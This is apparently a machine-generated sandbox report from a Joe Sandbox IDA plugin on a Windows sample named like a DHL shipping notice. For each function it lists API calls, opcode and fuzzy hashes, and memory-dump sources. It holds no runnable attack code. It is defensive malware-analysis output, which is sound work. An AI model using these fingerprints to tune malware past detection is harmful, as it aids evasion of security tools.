                                                                                      • Instruction ID: d53fb87b30bf0cbf526241e26ffa89a1ce5ff171c9330a00ec1aca705a7218dc
                                                                                      • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                      • Instruction Fuzzy Hash: 7181E472A00706ABE720AB69CC41BAA77E9EF81764F28453FF551D7381E770D9048BB0
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DC82D9,00DC82D9,?,?,?,00DD644F,00000001,00000001,8BE85006), ref: 00DD6258
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DD644F,00000001,00000001,8BE85006,?,?,?), ref: 00DD62DE
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DD63D8
                                                                                      • __freea.LIBCMT ref: 00DD63E5
                                                                                        • Part of subcall function 00DD3820: RtlAllocateHeap.NTDLL(00000000,?,00E71444,?,00DBFDF5,?,?,00DAA976,00000010,00E71440,00DA13FC,?,00DA13C6,?,00DA1129), ref: 00DD3852
                                                                                      • __freea.LIBCMT ref: 00DD63EE
                                                                                      • __freea.LIBCMT ref: 00DD6413
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 2599773f9e4d2b62bd739d0cf590e78a00a170a7604f702aea0c40b55ba3dc9c
                                                                                      • Instruction ID: 9880a1d95afdb09dde2b385da6e3ab66384dded689bc1d82a644ef6eb89052f1
                                                                                      • Opcode Fuzzy Hash: 2599773f9e4d2b62bd739d0cf590e78a00a170a7604f702aea0c40b55ba3dc9c
                                                                                      • Instruction Fuzzy Hash: 5B51E172600216AFDB258FA4DC81EBF7BA9EB44750F1D462AFC05D6241DB34DC54D6B0
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2B6AE,?,?), ref: 00E2C9B5
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2C9F1
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA68
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2BCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2BD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E2BD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E2BD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E2BDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E2BDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 1120388591-0
                                                                                      • Opcode ID: a24c308e538b552173e3d1aa1ade2916374656078557025deacbd0ac0ceb6edd
                                                                                      • Instruction ID: ed723dd7f03a379167a9de744f1486f355cad374bc10eccf1f707368313fade3
                                                                                      • Opcode Fuzzy Hash: a24c308e538b552173e3d1aa1ade2916374656078557025deacbd0ac0ceb6edd
                                                                                      • Instruction Fuzzy Hash: B781DF30208241EFC714DF24D895E6ABBE5FF85308F14895CF45A9B2A2DB31ED45CBA2
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00DFF7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00DFF860
                                                                                      • VariantCopy.OLEAUT32(00DFFA64,00000000), ref: 00DFF889
                                                                                      • VariantClear.OLEAUT32(00DFFA64), ref: 00DFF8AD
                                                                                      • VariantCopy.OLEAUT32(00DFFA64,00000000), ref: 00DFF8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00DFF8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: 5c0b8870c0132d76aea881e4b01a65680e73661ababdf4879c3a6e57d347dec2
                                                                                      • Instruction ID: 2fd2fda772b99c574f0f0ece1f6a8563ed9b8f4fc448efe257e36fad62f4e594
                                                                                      • Opcode Fuzzy Hash: 5c0b8870c0132d76aea881e4b01a65680e73661ababdf4879c3a6e57d347dec2
                                                                                      • Instruction Fuzzy Hash: 0851C636500318BACF20AB65D895B3DB3A4EF45710B25D467EA06EF292DBB0CC40DB76
                                                                                      APIs
                                                                                        • Part of subcall function 00DA7620: _wcslen.LIBCMT ref: 00DA7625
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00E194E5
                                                                                      • _wcslen.LIBCMT ref: 00E19506
                                                                                      • _wcslen.LIBCMT ref: 00E1952D
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00E19585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 83654149-3081909835
                                                                                      • Opcode ID: 44b9c887813c3aea9cd7f34cbe6021a0827f0e4b645b549035747f14e4ad0b6a
                                                                                      • Instruction ID: 59e74ef18d93b346b1749562848ded836db835c57ad5abc06c7d44619fe4cf2b
                                                                                      • Opcode Fuzzy Hash: 44b9c887813c3aea9cd7f34cbe6021a0827f0e4b645b549035747f14e4ad0b6a
                                                                                      • Instruction Fuzzy Hash: 0AE190315083108FC714DF24C891AAAB7E5FF85314F14996DF899AB2A2DB30DD45CBB2
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 00DB9241
                                                                                      • GetWindowRect.USER32(?,?), ref: 00DB92A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 00DB92C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DB92D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00DB9321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00DF71EA
                                                                                        • Part of subcall function 00DB9339: BeginPath.GDI32(00000000), ref: 00DB9357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: 170d3e5311c3418612c828214c6cce4e41de63e259b830e34271dd7c25030f5e
                                                                                      • Instruction ID: f22f88fc3290f027ddce217cecb83f225970c4be4f6ba7449fff8ee081a62e00
                                                                                      • Opcode Fuzzy Hash: 170d3e5311c3418612c828214c6cce4e41de63e259b830e34271dd7c25030f5e
                                                                                      • Instruction Fuzzy Hash: 7341BD30104344EFD711DF29C899FFABBB8EB86720F140269FA95A62A1C7309849DB71
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E1080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E10847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E10863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E108DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E108F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E10921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: 6be5da6d38616054e83e42295a4b270ffddc49940f1bbffe204e1ba595c5d0ca
                                                                                      • Instruction ID: 03576be695183d12f14313fb22d506063399f824948db6ceb7ab7dd9050fea1c
                                                                                      • Opcode Fuzzy Hash: 6be5da6d38616054e83e42295a4b270ffddc49940f1bbffe204e1ba595c5d0ca
                                                                                      • Instruction Fuzzy Hash: AC415971900205EFDF14AF65DC85AAA7BB9FF44314F1440A9E900AA296D770DEA4DBB0
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DFF3AB,00000000,?,?,00000000,?,00DF682C,00000004,00000000,00000000), ref: 00E3824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00E38272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E382D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00E382E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00E3830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E3832F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 642888154-0
                                                                                      • Opcode ID: 59414346d7df28698929fae208f78c35a8601014e56df6c35f7665aacaaecfda
                                                                                      • Instruction ID: 9af33d0f6c4e4e8f83b52efe8afec91442cb1da870cacb45184d89240cb33dae
                                                                                      • Opcode Fuzzy Hash: 59414346d7df28698929fae208f78c35a8601014e56df6c35f7665aacaaecfda
                                                                                      • Instruction Fuzzy Hash: 5541A430601744EFDB11CF19C99DBA57FE0BB45718F1861A9FA487B272CB32A845CB51
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00E04C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E04CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E04CEA
                                                                                      • _wcslen.LIBCMT ref: 00E04D08
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E04D10
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00E04D1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                      • String ID:
                                                                                      • API String ID: 72514467-0
                                                                                      • Opcode ID: 6cbf91fe2a6a5c084effabc988eef079fda8758cdc6a5eedca154f4d675b1664
                                                                                      • Instruction ID: 7c9ea2e6664a6d169b5983db3e7301a331e23f54cd887c644ff9e67d157e6ce3
                                                                                      • Opcode Fuzzy Hash: 6cbf91fe2a6a5c084effabc988eef079fda8758cdc6a5eedca154f4d675b1664
                                                                                      • Instruction Fuzzy Hash: C621F5F1204204BBFB155B259D4AE7B7B98DF45754F10502DF905EA1D1DA71CC4086B1
                                                                                      APIs
                                                                                        • Part of subcall function 00DA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA3A97,?,?,00DA2E7F,?,?,?,00000000), ref: 00DA3AC2
                                                                                      • _wcslen.LIBCMT ref: 00E1587B
                                                                                      • CoInitialize.OLE32(00000000), ref: 00E15995
                                                                                      • CoCreateInstance.OLE32(00E3FCF8,00000000,00000001,00E3FB68,?), ref: 00E159AE
                                                                                      • CoUninitialize.OLE32 ref: 00E159CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3172280962-24824748
                                                                                      • Opcode ID: 785a6c2a846323c70c72548141d9dce59fe3cacd68ea867d8b09cd8adf7604b9
                                                                                      • Instruction ID: 3b6d4634fb50eb93588df2274a02017ce26189aa9bd74b3083cfd8cc68ef9628
                                                                                      • Opcode Fuzzy Hash: 785a6c2a846323c70c72548141d9dce59fe3cacd68ea867d8b09cd8adf7604b9
                                                                                      • Instruction Fuzzy Hash: 0DD15472608701DFC714DF24C480AAABBE1EFC9714F14885DF899AB261D731ED85CBA2
                                                                                      APIs
                                                                                        • Part of subcall function 00E00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E00FCA
                                                                                        • Part of subcall function 00E00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E00FD6
                                                                                        • Part of subcall function 00E00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E00FE5
                                                                                        • Part of subcall function 00E00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E00FEC
                                                                                        • Part of subcall function 00E00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E01002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00E01335), ref: 00E017AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E017BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E017C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E017DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E01335), ref: 00E017EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00E017F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: 4d391a0bc708255c2442e97d3fba7970d03aa9b4e3d70ae0a8e664b6a1e29918
                                                                                      • Instruction ID: 18a5985db83f7f2d6d82febe0966ea8dcb265aa047d98966515cdfde992b6eac
                                                                                      • Opcode Fuzzy Hash: 4d391a0bc708255c2442e97d3fba7970d03aa9b4e3d70ae0a8e664b6a1e29918
                                                                                      • Instruction Fuzzy Hash: E411E131505209FFDB148FA4CC48BAE7BF8EB46319F244059F481BB150C732D984DB60
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E014FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E01506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E01515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00E01520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E0154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E01563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: 454cc8edc22aa337cb6f3bbbee4838955df49a618ae4d0fd87f9b0caec0acae5
                                                                                      • Instruction ID: 4dc2847a077aa8d61d47ac260a9b7ca7c0d9dd069fc122962933a09dad176146
                                                                                      • Opcode Fuzzy Hash: 454cc8edc22aa337cb6f3bbbee4838955df49a618ae4d0fd87f9b0caec0acae5
                                                                                      • Instruction Fuzzy Hash: 4C11567250020DAFDF118FA8DD49BDE7BA9EF48748F154065FA05B60A0C371CEA8DB60
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00DC3379,00DC2FE5), ref: 00DC3390
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DC339E
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DC33B7
                                                                                      • SetLastError.KERNEL32(00000000,?,00DC3379,00DC2FE5), ref: 00DC3409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 2b941a6b29da715abf34f30a37141c19c7a0fdaa3d48c5e691e4ed363f3cf445
                                                                                      • Instruction ID: cbda732ffc9b2abafd46c943227aa4e26a62ad46a22f28084f0da6c8a5ca91d5
                                                                                      • Opcode Fuzzy Hash: 2b941a6b29da715abf34f30a37141c19c7a0fdaa3d48c5e691e4ed363f3cf445
                                                                                      • Instruction Fuzzy Hash: 8701283220C313BEAA142775BC95F672A54DB053B9330832DF410A31F0EF518D0556B4
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00DD5686,00DE3CD6,?,00000000,?,00DD5B6A,?,?,?,?,?,00DCE6D1,?,00E68A48), ref: 00DD2D78
                                                                                      • _free.LIBCMT ref: 00DD2DAB
                                                                                      • _free.LIBCMT ref: 00DD2DD3
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00DCE6D1,?,00E68A48,00000010,00DA4F4A,?,?,00000000,00DE3CD6), ref: 00DD2DE0
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00DCE6D1,?,00E68A48,00000010,00DA4F4A,?,?,00000000,00DE3CD6), ref: 00DD2DEC
                                                                                      • _abort.LIBCMT ref: 00DD2DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 737a28d6ca6e1208ea8fd20291d9fd2894a10c52fde37f3f4bf3afa50023314b
                                                                                      • Instruction ID: c13737938cfab4b9a6b1c7ad1a773962a8e50b23377f2b36bebc55da5128b94d
                                                                                      • Opcode Fuzzy Hash: 737a28d6ca6e1208ea8fd20291d9fd2894a10c52fde37f3f4bf3afa50023314b
                                                                                      • Instruction Fuzzy Hash: DEF0A9315456006BC22227757C0AA3B2966EBE27B1F394417F464B2391EF64C80552B1
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB9693
                                                                                        • Part of subcall function 00DB9639: SelectObject.GDI32(?,00000000), ref: 00DB96A2
                                                                                        • Part of subcall function 00DB9639: BeginPath.GDI32(?), ref: 00DB96B9
                                                                                        • Part of subcall function 00DB9639: SelectObject.GDI32(?,00000000), ref: 00DB96E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E38A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00E38A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E38A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00E38A80
                                                                                      • EndPath.GDI32(?), ref: 00E38A90
